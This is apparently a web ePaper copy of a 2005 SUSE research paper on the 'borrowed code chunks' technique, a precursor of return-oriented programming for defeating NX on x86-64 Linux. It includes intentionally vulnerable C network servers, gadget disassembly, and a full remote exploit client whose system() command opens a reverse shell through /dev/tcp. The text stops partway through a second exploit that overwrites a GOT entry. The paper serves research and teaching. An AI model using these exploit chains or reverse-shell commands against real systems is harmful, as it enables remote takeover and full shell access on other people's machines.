x86-64 buffer overflow exploits and the borrowed code chunks - SuSE
x86-64 buffer overflow exploits and the borrowed code chunks - SuSE
x86-64 buffer overflow exploits and the borrowed code chunks - SuSE
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
<strong>x86</strong>-<strong>64</strong> <strong>buffer</strong> <strong>overflow</strong> <strong>exploits</strong> <strong>and</strong> <strong>the</strong> <strong>borrowed</strong><br />
<strong>code</strong> <strong>chunks</strong> exploitation technique<br />
Sebastian Krahmer krahmer@suse.de<br />
September 28, 2005<br />
Abstract<br />
The <strong>x86</strong>-<strong>64</strong> CPU platform (i.e. AMD<strong>64</strong> or Hammer) introduces new features to<br />
protect against exploitation of <strong>buffer</strong> <strong>overflow</strong>s, <strong>the</strong> so called No Execute (NX)<br />
or Advanced Virus Protection (AVP). This non-executable enforcement of data<br />
pages <strong>and</strong> <strong>the</strong> ELF<strong>64</strong> SystemV ABI render common <strong>buffer</strong> <strong>overflow</strong> exploitation<br />
techniques useless. This paper describes <strong>and</strong> analyzes <strong>the</strong> protection mechanisms<br />
in depth. Research <strong>and</strong> target platform was a SUSE Linux 9.3 <strong>x86</strong>-<strong>64</strong> system but<br />
<strong>the</strong> results can be exp<strong>and</strong>ed to non-Linux systems as well.<br />
search engine tag: SET-krahmer-bccet-2005.<br />
Contents<br />
1 Preface 2<br />
2 Introduction 2<br />
3 ELF<strong>64</strong> layout <strong>and</strong> <strong>x86</strong>-<strong>64</strong> execution mode 2<br />
4 The <strong>borrowed</strong> <strong>code</strong> <strong>chunks</strong> technique 4<br />
5 And does this really work? 7<br />
6 Single write <strong>exploits</strong> 8<br />
7 Automated exploitation 12<br />
8 Related work 17<br />
9 Countermeasures 18<br />
NO-NX<br />
10 Conclusion 18<br />
11 Credits 19<br />
1
1 PREFACE 2<br />
1 Preface<br />
Before you read this paper please be sure you properly underst<strong>and</strong> how <strong>buffer</strong><br />
<strong>overflow</strong>s work in general or how <strong>the</strong> return into libc trick works. It would be<br />
too much workload for me to explain it again in this paper. Please see <strong>the</strong> references<br />
section to find links to a description for <strong>buffer</strong> <strong>overflow</strong> <strong>and</strong> return into libc<br />
exploitation techniques.<br />
2 Introduction<br />
In recent years many security relevant programs suffered from <strong>buffer</strong> <strong>overflow</strong><br />
vulnerabilities. A lot of intrusions happen due to <strong>buffer</strong> <strong>overflow</strong> <strong>exploits</strong>, if not<br />
even most of <strong>the</strong>m. Historically <strong>x86</strong> CPUs suffered from <strong>the</strong> fact that data pages<br />
could not only be readable OR executable. If <strong>the</strong> read bit was set this page was<br />
executable too. That was fundamental for <strong>the</strong> common <strong>buffer</strong> <strong>overflow</strong> <strong>exploits</strong> to<br />
function since <strong>the</strong> so called shell<strong>code</strong> was actually data delivered to <strong>the</strong> program.<br />
If this data would be placed in a readable but non-executable page, it could still<br />
<strong>overflow</strong> internal <strong>buffer</strong>s but it won’t be possible to get it to execute. Dem<strong>and</strong>ing<br />
for such a mechanism <strong>the</strong> PaX kernel patch introduced a workaround for this<br />
r-means-x problem [7]. Todays CPUs (AMD<strong>64</strong> as well as newer <strong>x86</strong> CPUs)<br />
however offer a solution in-house. They enforce <strong>the</strong> missing execution bit even if<br />
a page is readable, unlike recent <strong>x86</strong> CPUs did. From <strong>the</strong> exploiting perspective<br />
this completely destroys <strong>the</strong> common <strong>buffer</strong> <strong>overflow</strong> technique since <strong>the</strong> attacker<br />
is not able to get execution to his shell<strong>code</strong> anymore. Why return-into-libc also<br />
fails is explained within <strong>the</strong> next sections.<br />
3 ELF<strong>64</strong> layout <strong>and</strong> <strong>x86</strong>-<strong>64</strong> execution mode<br />
On <strong>the</strong> Linux <strong>x86</strong>-<strong>64</strong> system <strong>the</strong> CPU is switched into <strong>the</strong> so called long mode.<br />
Stack wideness is <strong>64</strong> bit, <strong>the</strong> GPR registers also carry <strong>64</strong> bit width values <strong>and</strong> <strong>the</strong><br />
address size is <strong>64</strong> bit as well. The non executable bit is enforced if <strong>the</strong> Operating<br />
System sets proper page protections.<br />
linux:˜ # cat<br />
[1]+ Stopped cat<br />
linux:˜ # ps aux|grep cat<br />
root 13569 0.0 0.1 3680 600 pts/2 T 15:01 0:00 cat<br />
root 13571 0.0 0.1 3784 752 pts/2 R+ 15:01 0:00 grep cat<br />
linux:˜ # cat /proc/13569/maps<br />
00400000-00405000 r-xp 00000000 03:06 23635 /bin/cat<br />
00504000-00505000 rw-p 00004000 03:06 23635 /bin/cat<br />
00505000-00526000 rw-p 00505000 00:00 0<br />
2aaaaaaab000-2aaaaaac1000 r-xp 00000000 03:06 12568<br />
/lib<strong>64</strong>/ld-2.3.4.so<br />
2aaaaaac1000-2aaaaaac2000 rw-p 2aaaaaac1000 00:00 0<br />
2aaaaaac2000-2aaaaaac3000 r--p 00000000 03:06 13<strong>64</strong>2<br />
/usr/lib/locale/en_US.utf8/LC_IDENTIFICATION<br />
2aaaaaac3000-2aaaaaac9000 r--s 00000000 03:06 15336<br />
/usr/lib<strong>64</strong>/gconv/gconv-modules.cache<br />
2aaaaaac9000-2aaaaaaca000 r--p 00000000 03:06 15561<br />
/usr/lib/locale/en_US.utf8/LC_MEASUREMENT<br />
2aaaaaaca000-2aaaaaacb000 r--p 00000000 03:06 13<strong>64</strong>6<br />
/usr/lib/locale/en_US.utf8/LC_TELEPHONE<br />
2aaaaaacb000-2aaaaaacc000 r--p 00000000 03:06 13<strong>64</strong>1<br />
/usr/lib/locale/en_US.utf8/LC_ADDRESS<br />
2aaaaaacc000-2aaaaaacd000 r--p 00000000 03:06 13<strong>64</strong>5<br />
/usr/lib/locale/en_US.utf8/LC_NAME<br />
2aaaaaacd000-2aaaaaace000 r--p 00000000 03:06 15595<br />
/usr/lib/locale/en_US.utf8/LC_PAPER<br />
2aaaaaace000-2aaaaaacf000 r--p 00000000 03:06 15751<br />
/usr/lib/locale/en_US.utf8/LC_MESSAGES/SYS_LC_MESSAGES<br />
2aaaaaacf000-2aaaaaad0000 r--p 00000000 03:06 13<strong>64</strong>4<br />
/usr/lib/locale/en_US.utf8/LC_MONETARY<br />
2aaaaaad0000-2aaaaaba8000 r--p 00000000 03:06 15786<br />
/usr/lib/locale/en_US.utf8/LC_COLLATE<br />
NO-NX
3 ELF<strong>64</strong> LAYOUT AND X86-<strong>64</strong> EXECUTION MODE 3<br />
2aaaaaba8000-2aaaaaba9000 r--p 00000000 03:06 13<strong>64</strong>7<br />
2aaaaaba9000-2aaaaabaa000 r--p 00000000 03:06 15762<br />
2aaaaabc0000-2aaaaabc2000 rw-p 00015000 03:06 12568<br />
2aaaaabc2000-2aaaaacdf000 r-xp 00000000 03:06 12593<br />
2aaaaacdf000-2aaaaadde000 ---p 0011d000 03:06 12593<br />
2aaaaadde000-2aaaaade1000 r--p 0011c000 03:06 12593<br />
2aaaaade1000-2aaaaade4000 rw-p 0011f000 03:06 12593<br />
2aaaaade4000-2aaaaadea000 rw-p 2aaaaade4000 00:00 0<br />
2aaaaadea000-2aaaaae1d000 r--p 00000000 03:06 15785<br />
7ffffffeb000-800000000000 rw-p 7ffffffeb000 00:00 0<br />
ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0<br />
linux:˜ #<br />
/usr/lib/locale/en_US.utf8/LC_TIME<br />
/usr/lib/locale/en_US.utf8/LC_NUMERIC<br />
/lib<strong>64</strong>/ld-2.3.4.so<br />
/lib<strong>64</strong>/tls/libc.so.6<br />
/lib<strong>64</strong>/tls/libc.so.6<br />
/lib<strong>64</strong>/tls/libc.so.6<br />
/lib<strong>64</strong>/tls/libc.so.6<br />
/usr/lib/locale/en_US.utf8/LC_CTYPE<br />
As can be seen <strong>the</strong> .data section is mapped RW <strong>and</strong> <strong>the</strong> .text section<br />
with RX permissions. Shared libraries are loaded into RX protected<br />
pages, too. The stack got a new section in <strong>the</strong> newer ELF<strong>64</strong> binaries <strong>and</strong><br />
is mapped at address 0x7ffffffeb000 with RW protection bits in this<br />
example.<br />
linux:˜ # objdump -x /bin/cat |head -30<br />
/bin/cat: file format elf<strong>64</strong>-<strong>x86</strong>-<strong>64</strong><br />
/bin/cat<br />
architecture: i386:<strong>x86</strong>-<strong>64</strong>, flags 0x00000112:<br />
EXEC_P, HAS_SYMS, D_PAGED<br />
start address 0x00000000004010a0<br />
Program Header:<br />
PHDR off 0x0000000000000040 vaddr 0x0000000000400040 paddr 0x0000000000400040 align 2**3<br />
filesz 0x00000000000001f8 memsz 0x00000000000001f8 flags r-x<br />
INTERP off 0x0000000000000238 vaddr 0x0000000000400238 paddr 0x0000000000400238 align 2**0<br />
filesz 0x000000000000001c memsz 0x000000000000001c flags r--<br />
LOAD off 0x0000000000000000 vaddr 0x0000000000400000 paddr 0x0000000000400000 align 2**20<br />
filesz 0x000000000000494c memsz 0x000000000000494c flags r-x<br />
LOAD off 0x0000000000004950 vaddr 0x0000000000504950 paddr 0x0000000000504950 align 2**20<br />
filesz 0x00000000000003a0 memsz 0x0000000000000520 flags rw-<br />
DYNAMIC off 0x0000000000004978 vaddr 0x0000000000504978 paddr 0x0000000000504978 align 2**3<br />
filesz 0x0000000000000190 memsz 0x0000000000000190 flags rw-<br />
NOTE off 0x0000000000000254 vaddr 0x0000000000400254 paddr 0x0000000000400254 align 2**2<br />
filesz 0x0000000000000020 memsz 0x0000000000000020 flags r--<br />
NOTE off 0x0000000000000274 vaddr 0x0000000000400274 paddr 0x0000000000400274 align 2**2<br />
filesz 0x0000000000000018 memsz 0x0000000000000018 flags r--<br />
EH_FRAME off 0x000000000000421c vaddr 0x000000000040421c paddr 0x000000000040421c align 2**2<br />
filesz 0x000000000000015c memsz 0x000000000000015c flags r--<br />
STACK off 0x0000000000000000 vaddr 0x0000000000000000 paddr 0x0000000000000000 align 2**3<br />
filesz 0x0000000000000000 memsz 0x0000000000000000 flags rw-<br />
Dynamic Section:<br />
NEEDED libc.so.6<br />
INIT 0x400e18<br />
linux:˜ #<br />
On older Linux kernels <strong>the</strong> stack had no own section within <strong>the</strong> ELF binary<br />
since it was not possible to enforce read-no-execute anyways.<br />
As can be seen by <strong>the</strong> maps file of <strong>the</strong> cat process, <strong>the</strong>re is no page an<br />
attacker could potentially place his shell<strong>code</strong> <strong>and</strong> where he can jump into<br />
afterwards. All pages are ei<strong>the</strong>r not writable, so no way to put shell<strong>code</strong><br />
<strong>the</strong>re, or if <strong>the</strong>y are writable <strong>the</strong>y are not executable.<br />
It is not entirely new to <strong>the</strong> exploit <strong>code</strong>rs that <strong>the</strong>re is no way to put<br />
<strong>code</strong> into <strong>the</strong> program or at least to transfer control to it. For that reason<br />
two techniques called return-into-libc [5] <strong>and</strong> advanced-return-intolibc<br />
[4] have been developed. This allowed to bypass <strong>the</strong> PaX protection<br />
scheme in certain cases, if <strong>the</strong> application to be exploited gave conditions<br />
to use that technique. 1 However this technique works only on recent <strong>x86</strong><br />
NO-NX<br />
1 Address Space Layout R<strong>and</strong>omization for example could make things more difficult or <strong>the</strong> overall<br />
behavior of <strong>the</strong> program, however <strong>the</strong>re are techniques to bypass ASLR as well.
4 THE BORROWED CODE CHUNKS TECHNIQUE 4<br />
CPUs <strong>and</strong> NOT on <strong>the</strong> <strong>x86</strong>-<strong>64</strong> architecture since <strong>the</strong> ELF<strong>64</strong> SystemV ABI<br />
specifies that function call parameters are passed within registers 2 . The<br />
return-into-libc trick requires that arguments to e.g. system(3) are passed<br />
on <strong>the</strong> stack since you build a fake stack-frame for a fake system(3) function<br />
call. If <strong>the</strong> argument of system(3) has to be passed into <strong>the</strong> %rdi<br />
register, <strong>the</strong> return-into-libc fails or executes junk which is not under control<br />
of <strong>the</strong> attacker.<br />
4 The <strong>borrowed</strong> <strong>code</strong> <strong>chunks</strong> technique<br />
Since nei<strong>the</strong>r <strong>the</strong> common nor <strong>the</strong> return-into-libc way works we need to<br />
develop ano<strong>the</strong>r technique which I call <strong>the</strong> <strong>borrowed</strong> <strong>code</strong> <strong>chunks</strong> technique.<br />
You will see why this name makes sense.<br />
As with <strong>the</strong> return-into-libc technique this will focus on stack based <strong>overflow</strong>s.<br />
But notice that heap based <strong>overflow</strong>s or format bugs can often be<br />
mapped to stack based <strong>overflow</strong>s since one can write arbitrary data to an<br />
arbitrary location which can also be <strong>the</strong> stack.<br />
This sample program is used to explain how even in this restricted<br />
environment arbitrary <strong>code</strong> can be executed.<br />
1 #include <br />
2 #include <br />
3 #include <br />
4 #include <br />
5 #include <br />
6 #include <br />
7 #include <br />
8 #include <br />
9 #include <br />
10 #include <br />
11 #include <br />
12 void die(const char *s)<br />
13 {<br />
14 perror(s);<br />
15 exit(errno);<br />
16 }<br />
17 int h<strong>and</strong>le_connection(int fd)<br />
18 {<br />
19 char buf[1024];<br />
20 write(fd, "OF Server 1.0\n", 14);<br />
21 read(fd, buf, 4*sizeof(buf));<br />
22 write(fd, "OK\n", 3);<br />
23 return 0;<br />
24 }<br />
25 void sigchld(int x)<br />
26 {<br />
27 while (waitpid(-1, NULL, WNOHANG) != -1);<br />
28 }<br />
29 int main()<br />
30 {<br />
31 int sock = -1, afd = -1;<br />
32 struct sockaddr_in sin;<br />
2 The first 6 integer arguments, so this affects us.<br />
NO-NX
4 THE BORROWED CODE CHUNKS TECHNIQUE 5<br />
33 int one = 1;<br />
34 printf("&sock = %p system=%p mmap=%p\n", &sock, system, mmap);<br />
35 if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)<br />
36 die("socket");<br />
37 memset(&sin, 0, sizeof(sin));<br />
38 sin.sin_family = AF_INET;<br />
39 sin.sin_port = htons(1234);<br />
40 sin.sin_addr.s_addr = INADDR_ANY;<br />
41 setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));<br />
42 if (bind(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)<br />
43 die("bind");<br />
44 if (listen(sock, 10) < 0)<br />
45 die("listen");<br />
46 signal(SIGCHLD, sigchld);<br />
47 for (;;) {<br />
48 if ((afd = accept(sock, NULL, 0)) < 0 && errno != EINTR)<br />
49 die("accept");<br />
50 if (afd < 0)<br />
51 continue;<br />
52 if (fork() == 0) {<br />
53 h<strong>and</strong>le_connection(afd);<br />
54 exit(0);<br />
55 }<br />
56 close(afd);<br />
57 }<br />
58 return 0;<br />
59 }<br />
Obviously a <strong>overflow</strong> happens at line 21. Keep in mind, even if we are able<br />
to overwrite <strong>the</strong> return address <strong>and</strong> to place a shell<strong>code</strong> into buf, we can’t<br />
execute it since page permissions forbid it. We can’t use <strong>the</strong> return-intolibc<br />
trick ei<strong>the</strong>r since <strong>the</strong> function we want to ”call” e.g. system(3) expects<br />
<strong>the</strong> argument in <strong>the</strong> %rdi register. Since <strong>the</strong>re is no chance to transfer<br />
execution flow to our own instructions due to restricted page permissions<br />
we have to find a way to transfer arbitrary values into registers so that we<br />
could finally jump into system(3) with proper arguments. Lets analyze <strong>the</strong><br />
server binary at assembly level:<br />
0x0000000000400a40 : push %rbx<br />
0x0000000000400a41 : mov $0xe,%edx<br />
0x0000000000400a46 : mov %edi,%ebx<br />
0x0000000000400a48 : mov $0x400d0c,%esi<br />
0x0000000000400a4d : sub $0x400,%rsp<br />
0x0000000000400a54 : callq 0x400868 <br />
0x0000000000400a59 : mov %rsp,%rsi<br />
0x0000000000400a5c : mov %ebx,%edi<br />
0x0000000000400a5e : mov $0x800,%edx<br />
0x0000000000400a63 : callq 0x400848 <br />
0x0000000000400a68 : mov %ebx,%edi<br />
0x0000000000400a6a : mov $0x3,%edx<br />
0x0000000000400a6f : mov $0x400d1b,%esi<br />
0x0000000000400a74 : callq 0x400868 <br />
0x0000000000400a79 : add $0x400,%rsp<br />
0x0000000000400a80 : xor %eax,%eax<br />
0x0000000000400a82 : pop %rbx<br />
0x0000000000400a83 : retq<br />
All we control when <strong>the</strong> <strong>overflow</strong> happens is <strong>the</strong> content on <strong>the</strong> stack. At<br />
address 0x0000000000400a82 we see<br />
0x0000000000400a82 : pop %rbx<br />
0x0000000000400a83 : retq<br />
NO-NX<br />
We can control content of register %rbx, too. Might it be possible that<br />
%rbx is moved to %rdi somewhere? Probably, but <strong>the</strong> problem is that <strong>the</strong>
4 THE BORROWED CODE CHUNKS TECHNIQUE 6<br />
instructions which actually do this have to be prefix of a retq instruction<br />
since after %rdi has been properly filled with <strong>the</strong> address of <strong>the</strong> system(3)<br />
argument this function has to be called. Every single instruction between<br />
filling %rdi with <strong>the</strong> right value <strong>and</strong> <strong>the</strong> retq raises <strong>the</strong> probability that<br />
this content is destroyed or <strong>the</strong> <strong>code</strong> accesses invalid memory <strong>and</strong> segfaults.<br />
After an <strong>overflow</strong> we are not in a very stable program state at all.<br />
Lets see which maybe interesting instructions are a prefix of a retq.<br />
0x00002aaaaac7b632 : mov 0x68(%rsp),%rbx<br />
0x00002aaaaac7b637 : mov 0x70(%rsp),%rbp<br />
0x00002aaaaac7b63c : mov 0x78(%rsp),%r12<br />
0x00002aaaaac7b<strong>64</strong>1 : mov 0x80(%rsp),%r13<br />
0x00002aaaaac7b<strong>64</strong>9 : mov 0x88(%rsp),%r14<br />
0x00002aaaaac7b651 : mov 0x90(%rsp),%r15<br />
0x00002aaaaac7b659 : add $0x98,%rsp<br />
0x00002aaaaac7b660 : retq<br />
Interesting. This lets us fill %rbx, %rbp, %r12..%r15. But useless<br />
for our purpose. It might help if one of <strong>the</strong>se registers is moved to %rdi<br />
somewhere else though.<br />
0x00002aaaaac50bf4 : mov<br />
0x00002aaaaac50bf7 : callq<br />
%rsp,%rdi<br />
*%eax<br />
We can move content of %rsp to %rdi. If we wind up %rsp to <strong>the</strong> right<br />
position this is a way to go. Hence, we would need to fill %eax with <strong>the</strong><br />
address of system(3)...<br />
0x00002aaaaac743d5 : mov %rbx,%rax<br />
0x00002aaaaac743d8 : add $0xe0,%rsp<br />
0x00002aaaaac743df : pop %rbx<br />
0x00002aaaaac743e0 : retq<br />
Since we control %rbx from <strong>the</strong> h<strong>and</strong>le connection() outro we can fill<br />
%rax with arbitrary values too. %rdi will be filled with a stack address<br />
where we put <strong>the</strong> argument to system(3) to. Just lets reassemble which<br />
<strong>code</strong> snippets we <strong>borrowed</strong> from <strong>the</strong> server binary <strong>and</strong> in which order<br />
<strong>the</strong>y are executed:<br />
0x0000000000400a82 : pop %rbx<br />
0x0000000000400a83 : retq<br />
0x00002aaaaac743d5 : mov %rbx,%rax<br />
0x00002aaaaac743d8 : add $0xe0,%rsp<br />
0x00002aaaaac743df : pop %rbx<br />
0x00002aaaaac743e0 :<br />
retq<br />
0x00002aaaaac50bf4 : mov %rsp,%rdi<br />
0x00002aaaaac50bf7 : callq *%eax<br />
The retq instructions actually chain <strong>the</strong> <strong>code</strong> <strong>chunks</strong> toge<strong>the</strong>r (we control<br />
<strong>the</strong> stack!) so you can skip it while reading <strong>the</strong> <strong>code</strong>. Virtually, since we<br />
control <strong>the</strong> stack, <strong>the</strong> following <strong>code</strong> gets executed:<br />
pop<br />
mov<br />
add<br />
pop<br />
mov<br />
callq<br />
%rbx<br />
%rbx,%rax<br />
$0xe0,%rsp<br />
%rbx<br />
%rsp,%rdi<br />
*%eax<br />
NO-NX
5 AND DOES THIS REALLY WORK? 7<br />
That’s an instruction sequence which fills all <strong>the</strong> registers we need with<br />
values controlled by <strong>the</strong> attacker. This <strong>code</strong> snippet will actually be a<br />
call to system(”sh /dev/tcp/127.0.0.1/8080”)<br />
which is a back-connect shell<strong>code</strong>.<br />
5 And does this really work?<br />
Yes. Client <strong>and</strong> server program can be found at [10] so you can test it<br />
yourself. If you use a different target platform than mine you might have<br />
to adjust <strong>the</strong> addresses for <strong>the</strong> libc functions <strong>and</strong> <strong>the</strong> <strong>borrowed</strong> instructions.<br />
Also, <strong>the</strong> client program wants to be compiled on a <strong>64</strong> bit machine since<br />
o<strong>the</strong>rwise <strong>the</strong> compiler complains on too large integer values.<br />
1 void exploit(const char *host)<br />
2 {<br />
3 int sock = -1;<br />
4 char trigger[4096];<br />
5 size_t tlen = sizeof(trigger);<br />
6 struct t_stack {<br />
7 char buf[1024];<br />
8 u_int<strong>64</strong>_t rbx; // to be moved to %rax to be called as *eax = system():<br />
9 // 0x0000000000400a82 : pop %rbx<br />
10 // 0x0000000000400a83 : retq<br />
11 u_int<strong>64</strong>_t ulimit_133; // to call:<br />
12 // 0x00002aaaaac743d5 : mov %rbx,%rax<br />
13 // 0x00002aaaaac743d8 : add $0xe0,%rsp<br />
14 // 0x00002aaaaac743df : pop %rbx<br />
15 // 0x00002aaaaac743e0 : retq<br />
16 // to yield %rbx in %rax<br />
17 char rsp_off[0xe0 + 8]; // 0xe0 is added <strong>and</strong> one pop<br />
18 u_int<strong>64</strong>_t setuid_52; // to call:<br />
19 // 0x00002aaaaac50bf4 : mov %rsp,%rdi<br />
20 // 0x00002aaaaac50bf7 : callq *%eax<br />
21 char system[512]; // system() argument has to be *here*<br />
22 } __attribute__ ((packed)) server_stack;<br />
23 char *cmd = "sh < /dev/tcp/127.0.0.1/3128 > /dev/tcp/127.0.0.1/8080;";<br />
24 //char nop = ’;’;<br />
25 memset(server_stack.buf, ’X’, sizeof(server_stack.buf));<br />
26 server_stack.rbx = 0x00002aaaaabfb290;<br />
27 server_stack.ulimit_133 = 0x00002aaaaac743d5;<br />
28 memset(server_stack.rsp_off, ’A’, sizeof(server_stack.rsp_off));<br />
29 server_stack.setuid_52 = 0x00002aaaaac50bf4;<br />
30 memset(server_stack.system, 0, sizeof(server_stack.system)-1);<br />
31 assert(strlen(cmd) < sizeof(server_stack.system));<br />
32 strcpy(server_stack.system, cmd);<br />
33 if ((sock = tcp_connect(host, 1234)) < 0)<br />
34 die("tcp_connect");<br />
35 read(sock, trigger, sizeof(trigger));<br />
36 assert(tlen > sizeof(server_stack));<br />
37 memcpy(trigger, &server_stack, sizeof(server_stack));<br />
38 writen(sock, trigger, tlen);<br />
39 usleep(1000);<br />
40 read(sock, trigger, 1);<br />
41 close(sock);<br />
42 }<br />
NO-NX<br />
To make it clear, this is a remote exploit for <strong>the</strong> sample <strong>overflow</strong> server,<br />
not just some local <strong>the</strong>oretical proof of concept that some instructions can<br />
be executed. The attacker will get full shell access.
6 SINGLE WRITE EXPLOITS 8<br />
6 Single write <strong>exploits</strong><br />
The last sections focused on stack based <strong>overflow</strong>s <strong>and</strong> how to exploit<br />
<strong>the</strong>m. I already mentioned that heap based <strong>buffer</strong> <strong>overflow</strong>s or format<br />
string bugs can be mapped to stack based <strong>overflow</strong>s in most cases. To<br />
demonstrate this, I wrote a second <strong>overflow</strong> server which basically allows<br />
you to write an arbitrary (<strong>64</strong>-bit) value to an arbitrary (<strong>64</strong>-bit) address.<br />
This scenario is what happens under <strong>the</strong> hood of a so called malloc exploit<br />
or format string exploit. Due to overwriting of internal memory control<br />
structures it allows <strong>the</strong> attacker to write arbitrary content to an arbitrary<br />
address. A in depth description of <strong>the</strong> malloc exploiting techniques can be<br />
found in [8].<br />
1 #include <br />
2 #include <br />
3 #include <br />
4 #include <br />
5 #include <br />
6 #include <br />
7 #include <br />
8 #include <br />
9 #include <br />
10 #include <br />
11 #include <br />
12 void die(const char *s)<br />
13 {<br />
14 perror(s);<br />
15 exit(errno);<br />
16 }<br />
17 int h<strong>and</strong>le_connection(int fd)<br />
18 {<br />
19 char buf[1024];<br />
20 size_t val1, val2;<br />
21 write(fd, "OF Server 1.0\n", 14);<br />
22 read(fd, buf, sizeof(buf));<br />
23 write(fd, "OK\n", 3);<br />
24 read(fd, &val1, sizeof(val1));<br />
25 read(fd, &val2, sizeof(val2));<br />
26 *(size_t*)val1 = val2;<br />
27 write(fd, "OK\n", 3);<br />
28 return 0;<br />
29 }<br />
30 void sigchld(int x)<br />
31 {<br />
32 while (waitpid(-1, NULL, WNOHANG) != -1);<br />
33 }<br />
34 int main()<br />
35 {<br />
36 int sock = -1, afd = -1;<br />
37 struct sockaddr_in sin;<br />
38 int one = 1;<br />
39 printf("&sock = %p system=%p mmap=%p\n", &sock, system, mmap);<br />
40 if ((sock = socket(PF_INET, SOCK_STREAM, 0)) < 0)<br />
41 die("socket");<br />
42 memset(&sin, 0, sizeof(sin));<br />
43 sin.sin_family = AF_INET;<br />
44 sin.sin_port = htons(1234);<br />
45 sin.sin_addr.s_addr = INADDR_ANY;<br />
NO-NX<br />
46 setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));<br />
47 if (bind(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
6 SINGLE WRITE EXPLOITS 9<br />
48 die("bind");<br />
49 if (listen(sock, 10) < 0)<br />
50 die("listen");<br />
51 signal(SIGCHLD, sigchld);<br />
52 for (;;) {<br />
53 if ((afd = accept(sock, NULL, 0)) < 0 && errno != EINTR)<br />
54 die("accept");<br />
55 if (afd < 0)<br />
56 continue;<br />
57 if (fork() == 0) {<br />
58 h<strong>and</strong>le_connection(afd);<br />
59 exit(0);<br />
60 }<br />
61 close(afd);<br />
62 }<br />
63 return 0;<br />
<strong>64</strong> }<br />
An exploiting client has to fill val1 <strong>and</strong> val2 with proper values. Most<br />
of <strong>the</strong> time <strong>the</strong> Global Offset Table GOT is <strong>the</strong> place of choice to write<br />
values to. A disassembly of <strong>the</strong> new server2 binary shows why.<br />
0000000000400868 :<br />
400868: ff 25 8a 09 10 00 jmpq *1051018(%rip) # 5011f8 <br />
40086e: 68 04 00 00 00 pushq $0x4<br />
400873: e9 a0 ff ff ff jmpq 400818 <br />
When write() is called, transfer is controlled to <strong>the</strong> write() entry in <strong>the</strong><br />
Procedure Linkage Table PLT. This is due to <strong>the</strong> position independent<br />
<strong>code</strong>, please see [2]. The <strong>code</strong> looks up <strong>the</strong> real address to jump to from<br />
<strong>the</strong> GOT. The slot which holds <strong>the</strong> address of glibc’s write() is at address<br />
0x5011f8. If we fill this address with an address of our own, control<br />
is transfered <strong>the</strong>re. However, we again face <strong>the</strong> problem that we can not<br />
execute any shell<strong>code</strong> due to restrictive page protections. We have to use<br />
<strong>the</strong> <strong>code</strong> <strong>chunks</strong> borrow technique in some variant. The trick is here to<br />
shift <strong>the</strong> stack frame upwards to a stack location where we control <strong>the</strong><br />
content. This location is buf in this example but in a real server it could<br />
be some o<strong>the</strong>r <strong>buffer</strong> some functions upwards in <strong>the</strong> calling chain as well.<br />
Basically <strong>the</strong> same technique called stack pointer lifting was described<br />
in [5] but this time we use it to not exploit a stack based <strong>overflow</strong> but a<br />
single-write failure. How can we lift <strong>the</strong> stack pointer? By jumping in a<br />
appropriate function outro. We just have to find out how many bytes <strong>the</strong><br />
stack pointer has to be lifted. If I calculate correctly it has to be at least<br />
two <strong>64</strong>-bit values (val1 <strong>and</strong> val2) plus a saved return address from <strong>the</strong> write<br />
call = 3*sizeof(u int<strong>64</strong> t) = 3*8 = 24 Bytes. At least. Then %rsp points<br />
directly into buf which is under control of <strong>the</strong> attacker <strong>and</strong> <strong>the</strong> game starts<br />
again.<br />
Some <strong>code</strong> snippets from glibc which shows that %rsp can be lifted at<br />
almost arbitrary amounts:<br />
48158: 48 81 c4 d8 00 00 00 add $0xd8,%rsp<br />
4815f: c3 retq<br />
4c8f5: 48 81 c4 a8 82 00 00 add $0x82a8,%rsp<br />
4c8fc: c3 retq<br />
NO-NX
6 SINGLE WRITE EXPLOITS 10<br />
58825: 48 81 c4 00 10 00 00 add $0x1000,%rsp<br />
5882c: 48 89 d0 mov %rdx,%rax<br />
5882f: 5b pop %rbx<br />
58830: c3 retq<br />
5a76d: 48 83 c4 48 add $0x48,%rsp<br />
5a771: c3 retq<br />
5a890: 48 83 c4 58 add $0x58,%rsp<br />
5a894: c3 retq<br />
5a9f0: 48 83 c4 48 add $0x48,%rsp<br />
5a9f4: c3 retq<br />
5ad01: 48 83 c4 68 add $0x68,%rsp<br />
5ad05: c3 retq<br />
5b8e2: 48 83 c4 18 add $0x18,%rsp<br />
5b8e6: c3 retq<br />
5c063: 48 83 c4 38 add $0x38,%rsp<br />
5c067: c3 retq<br />
0x00002aaaaac1a90a : add $0x8,%rsp<br />
0x00002aaaaac1a90e : pop %rbx<br />
0x00002aaaaac1a90f : pop %rbp<br />
0x00002aaaaac1a910 : retq<br />
The last <strong>code</strong> chunk fits perfectly in our needs since it lifts <strong>the</strong> stack pointer<br />
by exactly 24 Bytes. So <strong>the</strong> value we write to <strong>the</strong> address 0x5011f8 3 is<br />
0x00002aaaaac1a90a. When lifting is done, %rsp points to buf, <strong>and</strong><br />
we can re-use <strong>the</strong> addresses <strong>and</strong> values from <strong>the</strong> o<strong>the</strong>r exploit.<br />
1 void exploit(const char *host)<br />
2 {<br />
3 int sock = -1;<br />
4 char trigger[1024];<br />
5 size_t tlen = sizeof(trigger), val1, val2;<br />
6 struct t_stack {<br />
7 u_int<strong>64</strong>_t ulimit_143; // stack lifting from modified GOT pops this into %rip<br />
8 u_int<strong>64</strong>_t rbx; // to be moved to %rax to be called as *eax = system():<br />
9 // 0x00002aaaaac743df : pop %rbx<br />
10 // 0x00002aaaaac743e0 : retq<br />
11 u_int<strong>64</strong>_t ulimit_133; // to call:<br />
12 // 0x00002aaaaac743d5 : mov %rbx,%rax<br />
13 // 0x00002aaaaac743d8 : add $0xe0,%rsp<br />
14 // 0x00002aaaaac743df : pop %rbx<br />
15 // 0x00002aaaaac743e0 : retq<br />
16 // to yied %rbx in %rax<br />
17 char rsp_off[0xe0 + 8]; // 0xe0 is added <strong>and</strong> one pop<br />
18 u_int<strong>64</strong>_t setuid_52; // to call:<br />
19 // 0x00002aaaaac50bf4 : mov %rsp,%rdi<br />
20 // 0x00002aaaaac50bf7 : callq *%eax<br />
21 char system[512]; // system() argument has to be *here*<br />
22 } __attribute__ ((packed)) server_stack;<br />
